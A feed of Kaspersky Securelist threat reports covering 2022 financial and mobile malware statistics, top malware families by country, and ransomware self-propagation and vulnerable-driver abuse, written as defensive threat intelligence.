Cryptoscams exploit the topic of cryptocurrency to deceive people and steal their money, often through promises of high returns on investments. Common types include Ponzi schemes, ICO scams, phishing scams, and fake wallet scams.

Example of a phishing page asking for crypto details

Example of a phishing page asking for crypto details

Banking malware

This section analyzes banking malware used for stealing login credentials for online banking or payment systems, as well as capturing one-time passwords for two-factor authentication.

Our analysis of financial cyberthreats in 2022 revealed that the number of users affected by financial malware continued to decline. The figures showed a decrease from 405,985 in 2021 to 350,808 in 2022, marking a 14% drop. This decline followed the trend observed over the previous years, with a 35% drop in 2021, a 20% decline in 2020, and a near 13% decrease in 2019. Financial PC malware is on the wane due to the challenges and costs associated with maintaining and developing a botnet capable of successfully attacking users. To execute a successful attack, the Trojan must wait until the user manually logs in to their bank’s website, which has become more infrequent with the growth in popularity of mobile banking apps. Furthermore, the latest versions of operating systems come with built-in security systems, and prolonged presence in the system raises the probability of malware detection. This might also indicate a pivot toward advanced targeted attacks as cybercriminals start to prioritize large business targets.

Additionally, cybercriminals are adapting their tactics to exploit the shift toward mobile banking. As users increasingly switch to phone banking, attackers are developing new techniques to compromise mobile devices and steal sensitive information.

Dynamic change in the number of unique users attacked by banking malware in 2021 – 2022  (download)

Main actors among banking malware

Our 2022 analysis of financial cyberthreats revealed the presence of several families of banking malware with varying lifecycles. Ramnit emerged as the most prevalent malware family with a share of 34.4%, followed by Zbot with 16.2%. Interestingly, the analysis highlights that over 50% of affected users were targeted only by these two families. Ramnit activity increased substantially compared to the previous year, when its slice was only 3.4%. This malware worm spreads through spam emails with links to infected websites, and steals financial information. Emotet, previously named by Europol the world’s most dangerous malware, made a return to the Top 3 most active malware families after law enforcement shut it down in January 2021.

The lifecycle of Emotet vividly demonstrates how malware families continue to evolve and expand their capabilities to infiltrate and compromise financial systems.

Top 10 PC banking malware families

Name Verdicts %*
Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 34.4
Zbot/Zeus Trojan-Banker.Win32.Zbot 16.2
Emotet Trojan-Banker.Win32.Emotet 6.4
CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 6.2
IcedID Trojan-Banker.Win32.IcedID 4.1
Trickster/Trickbot Trojan-Banker.Win32.Trickster 4.0
SpyEye Trojan-Spy.Win32.SpyEye 3.4
RTM Trojan-Banker.Win32.RTM 2.5
Gozi Trojan-Banker.Win32.Gozi 2.4
BitStealer Trojan-Banker.MSIL.BitStealer 1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of attacked users

In this year’s report, we calculated the percentage of Kaspersky users in each country that encountered a financial cyberthreat relative to all users that were attacked by financial malware. This approach helps us identify the countries with the highest risk of computer infection due to financial malware.

The 2022 report shows the distribution of financial malware attacks across different countries. The Top 20 countries in the list below account for more than half of all infection attempts.

Top 20 countries and territories by share of attacked users

Country or territory* %**
Turkmenistan 6.6
Afghanistan 6.5
Tajikistan 4.9
China 3.3
Uzbekistan 3.3
Yemen 3.3
Sudan 2.9
Mauritania 2.8
Egypt 2.5
Azerbaijan 2.5
Venezuela 2.5
Paraguay 2.5
Switzerland 2.4
Syria 2.4
Libya 2.3
Algeria 2.2
Iraq 2.0
Indonesia 1.9
Bangladesh 1.8
Pakistan 1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

The data shows that Turkmenistan has the highest share of attacked users with 6.6%, followed by Afghanistan and Tajikistan with 6.5% and 4.9% respectively.

Types of users attacked

The 2022 numbers show that the distribution of financial cyberthreats remained relatively stable, with consumers (61.8%) still being the primary target and corporate users (38.2%) accounting for a smaller percentage of attacks. The 2022 increase is relatively small, at less than 1%, and does not represent a significant shift in the overall distribution of attacks.

Malware attack distribution by type (corporate vs consumer), 2021 – 2022 (download)

This can be attributed to the fact that the world has become accustomed to the new style of post-pandemic work, with many companies continuing to operate in remote or hybrid work modes. The trend of working from home or remotely is no longer new, and many companies have adapted to it. As a result, they have also learned how to deal with potential threats and have implemented measures to ensure the security of their employees’ devices and data. Now employees are likely using similar devices and security measures for personal and work purposes, making it harder for cybercriminals to differentiate between consumer and corporate targets.

Mobile banking malware

We have been observing a steady and steep downward trend in the number of Android users affected by banking malware for at least four years now. In 2022, the number of Android users attacked with banking malware was 57,219, which is more than 2.5 times less than the figures reported in the previous year, representing a drop of around 55%.

This trend marked a continuation from previous years, with the number of Android users attacked dropping by 55% in 2020 and by almost 50% in 2021, resulting in a total of 147,316 users affected in 2021.

Number of Android users attacked by banking malware by month, 2020 – 2022 (download)

Despite the steady decline in the number of Android users affected by banking malware, it is important for users not to become complacent, as cybercriminals continue to evolve their malware and find new ways to carry out attacks. In 2022, we identified over 200,000 new banking Trojan installers, which is twice the number reported in the previous year.

Comparing the most active mobile malware families of 2021 to those of 2022, we see some significant changes. In 2021, Agent was the most prevalent mobile malware, representing 26.9% of attacks. However, in 2022, Bian surpassed Agent as the most active mobile malware family, with 24.25% attacks compared to Agent’s 21.57%.

As for the other malware families on the list, Anubis (11.24%) and Faketoken (10.53%) maintained their positions in the Top 5, respectively. Asacub also remained in the Top 5 list, with almost 10% of attacks, but dropped to fifth place from its third-place ranking in 2021.

Top10 Android banking malware families

Name Verdicts %*
Bian Trojan-Banker.AndroidOS.Bian 24.25
Agent Trojan-Banker.AndroidOS.Agent 21.57
Anubis Trojan-Banker.AndroidOS.Anubis 11.24
Faketoken Trojan-Banker.AndroidOS.Faketoken 10.53
Asacub Trojan-Banker.AndroidOS.Asacub 9.91
Svpeng Trojan-Banker.AndroidOS.Svpeng 6.08
Cebruser Trojan-Banker.AndroidOS.Cebruser 5.23
Gustuff Trojan-Banker.AndroidOS.Gustuff 3.13
Bray Trojan-Banker.AndroidOS.Bray 2.27
Sova Trojan-Banker.AndroidOS.Sova 2.14

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Svpeng, which was the third most prevalent malware family in 2021, with 21.4% of attacks, dropped to sixth place in 2022, with 6.08% attacks. Meanwhile, Cebruser, Gustuff, Bray, and Sova entered the list.

Geography of attacked users

The geographical distribution of affected users by Android banking malware in 2021 shows some differences between the two lists of Top 10 countries and regions. In the first list, Japan had the highest percentage of targeted users with 2.18%, followed by Spain with 1.55%, while in the second list, Spain had the highest percentage with 1.96%, followed by Saudi Arabia with 1.11%.

Australia appeared in both lists, with a 0.48% share in the first list and a 1.09% share in the second. Turkey also appeared in both lists, with a 0.71% share in the first list and a 0.99% share in the second. Italy had a 0.29% share in the first list and a 0.17% share in the second list, while Japan had a 0.30% share in the second list.

Top 10 countries and territories, 2021

Country or territory* %**
Japan 2.18
Spain 1.55
Turkey 0.71
France 0.57
Australia 0.48
Germany 0.46
Norway 0.31
Italy 0.29
Croatia 0.28
Austria 0.28

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Top 10 countries and territories, 2022

Country or territory* %**
Spain 1.96
Saudi Arabia 1.11
Australia 1.09
Turkey 0.99
Switzerland 0.48
Japan 0.30
Colombia 0.19
Italy 0.17
India 0.16
South Korea 0.16

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Overall, the two lists show that banking malware continues to be a global threat, affecting users in different countries and regions.

Conclusion

Year 2022 demonstrated that banking malware attacks continue to decline, both for PC and mobile malware. Still, the number of such attacks remains significant and users, as always, need to stay vigilant. At the same time, cybercriminals are switching their focus to cryptocurrency, as these attacks are harder to track. With new payment systems emerging, we are sure to see new attacks in the future and, potentially, yet more targeting of cryptocurrency.

Additionally, financial phishing schemes remain a top category in all phishing, with fraudsters continuing to hunt for banking and other sensitive data, exploiting trusted brands. This activity isn’t likely to die down, and we will continue to witness new schemes emerge on a regular basis.

For protection against financial threats, Kaspersky recommends to:

  • Install only applications obtained from reliable sources
  • Refrain from approving rights or permissions requested by applications without first ensuring they match the application’s feature set
  • Never open links or documents included in unexpected or suspicious-looking messages
  • Use a reliable security solution, such as Kaspersky Premium, that protects you and your digital infrastructure from a wide range of financial cyberthreats

To protect your business from financial malware, Kaspersky security experts recommend:

  • Providing cybersecurity awareness training, especially for employees responsible for accounting, that includes instructions on how to detect phishing pages
  • Improving the digital literacy of staff
  • Enabling a Default Deny policy for critical user profiles, particularly those in financial departments, which ensures that only legitimate web resources can be accessed
  • Installing the latest updates and patches for all software used
]]>
https://securelist.com/financial-cyberthreats-in-2022/109219/feed/ 0 full large medium thumbnail
The mobile malware threat landscape in 2022 https://securelist.com/mobile-threat-report-2022/108844/ https://securelist.com/mobile-threat-report-2022/108844/#comments Mon, 27 Feb 2023 10:05:35 +0000 https://kasperskycontenthub.com/securelist/?p=108844

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Figures of the year

In 2022, Kaspersky mobile products and technology detected:

  • 1,661,743 malicious installers
  • 196,476 new mobile banking Trojans
  • 10,543 new mobile ransomware Trojans

Mobile attacks leveled off after decreasing in the second half of 2021 and remained around the same level throughout 2022.

Kaspersky mobile cyberthreat detection dynamics in 2020–2022 (download)

Cybercriminals continued to use legitimate channels to spread malware.

Similarly to 2021, we found a modified WhatsApp build with malicious code inside in 2022. It was notable for spreading via ads inside the popular Snaptube app and through the Vidmate in-app store.

The spread of malware through Google Play continued as well. In particular, we found several mobile Trojan subscribers on Google’s official Android app marketplace in 2022. These secretly signed users up for paid services. In addition to the previously known Jocker and MobOk families, we discovered a new family, named Harly and active since 2020. Harly malware programs were downloaded a total of 2.6 million times from Google Play in 2022. Also last year, fraudsters abused the marketplace to spread various scam apps, which promised welfare payments or lucrative energy investments.

Mobile banking Trojans were not far behind. Despite Europol having shut down the servers of FluBot (also known as Polph or Cabassous, the largest mobile botnet in recent years), users had to stay on guard, as Google Play still contained downloaders for other banking Trojan families, such as Sharkbot, Anatsa/Teaban, Octo/Coper, and Xenomorph, all masquerading as utilities. For instance, the Sharkbot downloader in the screenshot below imitates a file manager. This type of software is capable of requesting permission to install further packages the Trojan needs to function on the unsuspecting user’s device.

The Sharkbot banking Trojan downloader on Google Play

Exploitation of popular game titles, where malware and unwanted software mimicked a pirated version of a game or game cheats, remained a popular mobile spread vector in 2022. The most frequently imitated titles included Minecraft, Roblox, Grand Theft Auto, PUBG, and FIFA. The malware spread primarily through questionable web sites, social media groups, and other unofficial channels.

Mobile cyberthreat statistics

Installer numbers

We detected 1,661,743 malware or unwanted software installers in 2022 — 1,803,013 less than we did in 2021. The number had been declining gradually since a 2020 increase.

Number of detected malicious installation packages in 2019–2022 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type in 2021 and 2022 (download)

RiskTool-type potentially unwanted software (27.39%) topped the rankings in 2022, replacing the previous leader, adware (24.05%). That said, the share of RiskTool had decreased by 7.89 percentage points, and the share of adware, by 18.38 percentage points year-on-year.

Various Trojan-type malware was third in the rankings with 15.56%, its cumulative share increasing by 6.7 percentage points.

Geography of mobile threats

TOP 10 countries by share of users attacked by mobile malware

Country* %**
1 China 17.70
2 Syria 15.61
3 Iran 14.53
4 Yemen 14.39
5 Iraq 8.44
6 Saudi Arabia 6.78
7 Kenya 5.52
8 Switzerland 5.44
9 Pakistan 5.21
10 Tanzania 5.15

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security (under 10,000).
** Unique users attacked as a percentage of all Kaspersky mobile security users in the country.

China had the largest share of users who experienced a mobile malware attack: 17.70%. Of these, 16.06% got hit by SMS-abusing malware that we detected as Trojan.AndroidOS.Najin.a.

Other countries with significant shares of attacked users were Syria (15.61%) and Iran (14.53%), where the most frequently encountered mobile cyberthreat was Trojan-Spy.AndroidOS.Agent.aas, a WhatsApp modification carrying a spy module.

Distribution of attacks by type of software used

Distribution of attacks by type of software used in 2022 (download)

Similarly to previous years, 2022 saw malware used in most mobile attacks (67.78%). The shares of attacks that used Adware- and RiskWare-type applications had increased to 26.91% from 16.92% in 2021 and to 5.31% from 2.38% in 2021, respectively.

Mobile adware

The Adlo family accounted for the largest share of detected installers (22.07%) in 2022. These are useless fake apps that download ads. Adlo replaced the previous leader, the Ewind family, which had a share of 16.46%.

TOP 10 most frequently detected adware families in 2022

Family %*
1 Adlo 22.07
2 Ewind 16.46
3 HiddenAd 15.02
4 MobiDash 11.30
5 Dnotua 5.08
6 FakeAdBlocker 5.02
7 Agent 4.02
8 Fyben 3.94
9 Notifyer 3.19
10 Dowgin 1.38

* The share of the adware-type family in the total number of adware installers detected.

RiskTool-type apps

The SMSreg family retained its lead by number of detected RiskTool-type apps: 36.47%. The applications in this family make payments (for example by transferring cash to other individuals or paying for mobile service subscriptions) by sending text messages without explicitly notifying the user.

TOP 10 most frequently detected RiskTool families, 2022

Family %*
1 SMSreg 36.47
2 Dnotua 26.19
3 Robtes 24.41
4 Resharer 2.67
5 Agent 2.39
6 SmsSend 1.29
7 SpyLoan 1.29
8 Skymobi 1.10
9 SmsPay 0.71
10 Wapron 0.66

* The share of the RiskTool family in the total number of RiskTool installers detected.

TOP 20 most frequently detected mobile malware programs

Note that the malware rankings below exclude riskware or potentially unwanted software, such as RiskTool or adware.

Verdict %*
1 DangerousObject.Multi.Generic 18.97
2 Trojan-SMS.AndroidOS.Fakeapp.d 8.65
3 Trojan.AndroidOS.Generic 6.70
4 Trojan-Spy.AndroidOS.Agent.aas 6.01
5 Trojan.AndroidOS.Fakemoney.d 4.65
6 Trojan.AndroidOS.GriftHorse.l 4.32
7 Trojan-Dropper.AndroidOS.Agent.sl 3.22
8 DangerousObject.AndroidOS.GenericML 2.96
9 Trojan-SMS.AndroidOS.Fakeapp.c 2.37
10 Trojan.AndroidOS.Fakeapp.ed 2.19
11 Trojan.AndroidOS.GriftHorse.ah 2.00
12 Trojan-Downloader.AndroidOS.Agent.kx 1.72
13 Trojan.AndroidOS.Soceng.f 1.67
14 Trojan-Dropper.AndroidOS.Hqwar.hd 1.49
15 Trojan.AndroidOS.Fakeapp.dw 1.43
16 Trojan-Ransom.AndroidOS.Pigetrl.a 1.43
17 Trojan-Downloader.AndroidOS.Necro.d 1.40
18 Trojan-SMS.AndroidOS.Agent.ado 1.36
19 Trojan-Dropper.AndroidOS.Hqwar.gen 1.35
20 Trojan-Spy.AndroidOS.Agent.acq 1.34

* Unique users attacked by the malware as a percentage of all attacked Kaspersky mobile security users.
First and third places went to DangerousObject.Multi.Generic (18.97%) and Trojan.AndroidOS.Generic (6.70%), respectively, which are verdicts we use for malware detected with cloud technology. Cloud technology is triggered whenever the antivirus databases lack data for detecting a piece of malware, but the antivirus company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

The Trojans in second and ninth places (8.65% and 2.37%) belonged to the Trojan-SMS.AndroidOS.Fakeapp family. This type of malware is capable of sending text messages and calling preset numbers, displaying ads, and hiding its icon on the device.

WhatsApp modifications equipped with a spy module, detected as Trojan-Spy.AndroidOS.Agent.aas (6.01%) and Trojan-Spy.AndroidOS.Agent.acq (1.34%) were in fourth and twentieth positions, respectively.

Scam apps detected as Trojan.AndroidOS.Fakemoney.d (4.65%) were the fifth-largest category. These try to trick users into believing that they are filling out an application for a welfare payout.

Members of the Trojan.AndroidOS.GriftHorse family, which subscribe the user to premium SMS services, took both sixth and eleventh places (4.32% and 2%, respectively).

The banking Trojan dropper Trojan-Dropper.AndroidOS.Agent.sl (3.22%) was seventh.

The verdict of DangerousObject.AndroidOS.GenericML (2.96%) sank to eighth place. The verdict is assigned to files recognized as malicious by our machine-learning systems.

Tenth place was taken by Trojan.AndroidOS.Fakeapp.ed (2.19%). This verdict refers to a category of fraudulent apps which target users in Russia by posing as a stock-trading platform for investing in gas.

Trojan-Downloader.AndroidOS.Agent.kx (1.72%) rose to twelfth position. This type of malware is distributed as part of legitimate software, downloading advertising modules.

Trojan.AndroidOS.Soceng.f (1.67%), in thirteenth place, sends text messages to people on your contact list, deletes files on the SD card, and overlays the interfaces of popular apps with its own window.

Malware from the Trojan-Dropper.AndroidOS.Hqwar family, which unpacks and runs various banking Trojans, occupied fourteenth and nineteenth places (1.49 and 1.35%).

Trojan.AndroidOS.Fakeapp.dw was fifteenth (1.43%). The verdict applies to a variety of scam apps, such as those supposedly offering the user to earn some extra cash.

Trojan-Ransom.AndroidOS.Pigetrl.a (1.43%) took sixteenth place. Unlike classic Trojan-Ransom malware, which typically demands a ransom, it simply locks the screen and asks to enter a code. The application offers no instructions on obtaining the code, which is embedded in the program itself.

Trojan-Downloader.AndroidOS.Necro.d sank to seventeenth position (1.4%). This malware is capable of downloading, installing, and running other applications when commanded by its operators.

Trojan-SMS.AndroidOS.Agent.ado, which sends text messages to shortcodes, was eighteenth (1.36%).

Mobile banking Trojans

We detected 196,476 mobile banking Trojan installers in 2022, a year-on-year increase of 100% and the highest figure in the past six years.

The Trojan-Banker.AndroidOS.Bray family accounted for two-thirds (66.40%) of all detected banking Trojans. This family attacked mostly users in Japan. It was followed by the Trojan-Banker.AndroidOS.Fakecalls family (8.27%) and Trojan-Banker.AndroidOS.Bian (3.25%).

The number of mobile banking Trojan installers detected by Kaspersky in 2019–2022 (download)

Although the number of detected malware installers rose in 2022, mobile banking Trojan attacks had been decreasing since a 2020 rise.

The number of mobile banking Trojan attacks in 2021–2022 (download)

TOP 10 most frequently detected mobile banking Trojans

Verdict %*
1 Trojan-Banker.AndroidOS.Bian.h 28.74
2 Trojan-Banker.AndroidOS.Anubis.t 11.50
3 Trojan-Banker.AndroidOS.Svpeng.q 5.50
4 Trojan-Banker.AndroidOS.Agent.ep 5.25
5 Trojan-Banker.AndroidOS.Agent.eq 4.51
6 Trojan-Banker.AndroidOS.Gustuff.d 3.88
7 Trojan-Banker.AndroidOS.Asacub.ce 3.54
8 Trojan-Banker.AndroidOS.Sova.g 2.72
9 Trojan-Banker.AndroidOS.Faketoken.z 2.01
10 rojan-Banker.AndroidOS.Bray.f 1.71

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security users attacked by banking threats.
Of all mobile banking Trojans that were active in 2022, Trojan-Banker.AndroidOS.Bian.h (28.74%) accounted for the largest share of attacked users, more than half of those in Spain.

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 Spain 1.96
2 Saudi Arabia 1.11
3 Australia 1.09
4 Turkey 0.99
5 China 0.73
6 Switzerland 0.48
7 Japan 0.30
8 Colombia 0.19
9 Italy 0.17
10 India 0.16

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.

Spain had the largest share of unique users attacked by mobile financial threats in 2022 (1.96%), with 85.90% of the affected users encountering the aforementioned Trojan-Banker.AndroidOS.Bian.h.

It was followed by Saudi Arabia (1,11%), also due to Trojan-Banker.AndroidOS.Bian.h, which affected 97.92% of users in that country.

Australia (1.09%) was third, with 98% of the users who encountered banking Trojans there attacked by Trojan-Banker.AndroidOS.Gustuff.

Mobile ransomware Trojans

We detected 10,543 mobile ransomware Trojan installers in 2022, which was 6,829 less than the 2021 figure.

The number of mobile ransomware Trojan installers detected by Kaspersky in 2019–2022 (download)

The number of mobile ransomware Trojan attacks also continued to decline, a process that started in late 2021.

The number of mobile ransomware Trojan attacks in 2021–2022 (download)

Verdict %*
1 Trojan-Ransom.AndroidOS.Pigetrl.a 75.10
2 Trojan-Ransom.AndroidOS.Rkor.br 3.70
3 Trojan-Ransom.AndroidOS.Small.as 1.81
4 Trojan-Ransom.AndroidOS.Rkor.bs 1.60
5 Trojan-Ransom.AndroidOS.Rkor.bi 1.48
6 Trojan-Ransom.AndroidOS.Rkor.bt 1.19
7 Trojan-Ransom.AndroidOS.Fusob.h 1.05
8 Trojan-Ransom.AndroidOS.Rkor.ch 0.99
9 Trojan-Ransom.AndroidOS.Rkor.bp 0.92
10 Trojan-Ransom.AndroidOS.Congur.cw 0.90

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security users attacked by ransomware Trojans.
Trojan-Ransom.AndroidOS.Pigetrl.a remained the leading ransomware Trojan family in 2022 (75.10%). It was also one of the TOP 20 most frequently detected mobile malware types. Russia accounted for as much as 92.74% of detections.

That malware family was followed by Trojan-Ransom.AndroidOS.Rkor, which blocks the screen and demands the user to pay a fine for some illegal content they had supposedly viewed. Members of this family took six out of ten places in our rankings, with as much as 65.27% attacked users located in Kazakhstan.

TOP 10 countries by share of users attacked by mobile ransomware Trojans

Country* %**
1 China 0.65
2 Yemen 0.49
3 Kazakhstan 0.36
4 Iraq 0.08
5 Azerbaijan 0.05
6 Kyrgyzstan 0.05
7 Switzerland 0.04
8 Saudi Arabia 0.04
9 Lebanon 0.04
10 Egypt 0.03

* Excluded from the rankings are countries with relatively few Kaspersky mobile security users (under 10,000).
** Unique users attacked by mobile ransomware Trojans as a percentage of all Kaspersky mobile security users in the country.

We observed the highest shares of users attacked by mobile ransomware Trojans in 2022 in China (0.65%), Yemen (0.49%), and Kazakhstan (0.36%).

Users in China mostly encountered Trojan-Ransom.AndroidOS.Congur.y, most users in Yemen were affected by Trojan-Ransom.AndroidOS.Pigetrl.a, and a majority of users in Kazakhstan were hit by Trojan-Ransom.AndroidOS.Rkor.br.

Conclusion

The cybercriminal activity leveled off in 2022, with attack numbers remaining steady after a decrease in 2021. That said, cybercriminals are still working on improving both malware functionality and spread vectors. Malware is increasingly spreading through legitimate channels, such as official marketplaces and ads in popular apps. This is true for both scam apps and dangerous mobile banking malware.

Potentially unwanted applications (RiskWare) accounted for a majority of newly detected threats in 2022, replacing the previous leader, adware. Most mobile cyberattacks used malware as before.

]]>
https://securelist.com/mobile-threat-report-2022/108844/feed/ 3 full large medium thumbnail
Crimeware trends: self-propagation and driver exploitation https://securelist.com/crimeware-report-ransomware-tactics-vulnerable-drivers/108197/ https://securelist.com/crimeware-report-ransomware-tactics-vulnerable-drivers/108197/#respond Mon, 05 Dec 2022 10:00:58 +0000 https://kasperskycontenthub.com/securelist/?p=108197

Introduction

If one sheep leaps over the ditch, the rest will follow. This is an old saying, found in various languages, and it can be applied to ransomware developers. In previous blog posts, we highlighted an increase in the popularity of platform-independent languages and ESXi support, and recently, we wrote about ransomware borrowing these propagation methods.

Last month, we wrote in our crimeware reporting service about further ransomware variants that now had their own methods for copying and executing malware on other machines within the network. We also wrote about a case of abusing vulnerable drivers, something that might become popular in the future as well. In this blog post, we provide excerpts from these reports.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

Some ransomware statistics

During the first ten months of 2022, the share of users affected by targeted ransomware among all users affected by all types of malware almost doubled year-on-year, reaching 0.026%.

Share of users attacked by targeted ransomware, January–October 2021 and January–October, 2022 (download)

LockBit

LockBit is one of the most popular, innovative and rapidly developing current ransomware families. Recently, we noticed that a new option was added to the LockBit builder site, as can be seen below:

New functionality created by LockBit developers

In addition to PsExec, the most common way of spreading ransomware overall, LockBit now supports “self-spread”. Naturally, we were interested in the details of this self-spreading mechanism—especially, how it works.

The ransomware is installed as a service onto the infected machine. This service makes a call to netapi32.DsGetDcNameW to get the details of the domain that the infected machine belongs to and then creates a named pipe. When this operation is complete, the module dumps the operating system credentials, obtaining the handles from explorer.exe and lsass.exe with the help of the named pipe created earlier.

This is where it stops. Essentially, there is no self-spreading—this is more of credential dumping. Although it fits in the broader trend we are seeing these days—more and more functionality embedded in ransomware to reduce reliance on other tools—there is no self-spreading, as it is no longer necessary to use tools like Mimikatz.

Play

Play is a new ransomware variant that we recently ran into—it has no code similarities with other ransomware samples. The ransomware is highly obfuscated, which complicates analysis.

Play is in an early development stage. For example, there is no leak site and victims have to contact the criminals via the email address in the ransom note. Despite this, Play also contains functionality that lately has been found in other ransomware variants: self-propagation.

Play collects different IPs on the same subnet and tries to discover SMB resources with the help of NetShareEnum(), which results in ARP traffic, as can be seen from the Wireshark screenshot below. The idea behind this activity is to spread the ransomware to other machines on the same network.

ARP requests made by Play ransomware

Once an SMB resource is found, the ransomware establishes a connection, and tries to mount it, and to spread and execute itself in the remote system. This can be seen in the Wireshark screenshot below.

SMB connections

Driver abuse

Drivers can contain vulnerabilities that attackers may be able to exploit. One such driver is Anti Rootkit by Avast. Although it was previously abused by AvosLocker, the vulnerabilities that are being exploited now (CVE-2022-26522 and CVE-2022-26523) were not known back then. They allow attackers to escalate their privileges in the targeted system or perform a sandbox escape. The vulnerabilities were described in detail by SentinelLabs and fixed at the beginning of 2022. We know that at least two ransomware families, AvosLocker and Cuba, exploit these.

There are a few advantages to using the trick with vulnerable drivers. Firstly, it disables other security products in the system. Secondly, it is a security solution that is being installed, which results in fewer alerts being raised. Thirdly, by exploiting the driver, the attackers can kill processes running on the machine.

The process killing function

Conclusion

Ransomware developers keep an eye on their competitors’ work. If one of them implements certain functionality that works well, chances are that others will follow suit This keeps their ransomware more interesting for their affiliates. The self-propagation of ransomware is a prime example of that.

Therefore, we believe that faulty drivers could be yet another instance of typical ransomware group TTP that other groups will borrow in the future.

Intelligence reports can help you to protect yourself against these threats. If you want to stay up to date on the latest TTPs used by criminals or if you have questions about our private reports, please contact crimewareintel@kaspersky.com.

]]>
https://securelist.com/crimeware-report-ransomware-tactics-vulnerable-drivers/108197/feed/ 0 full large medium thumbnail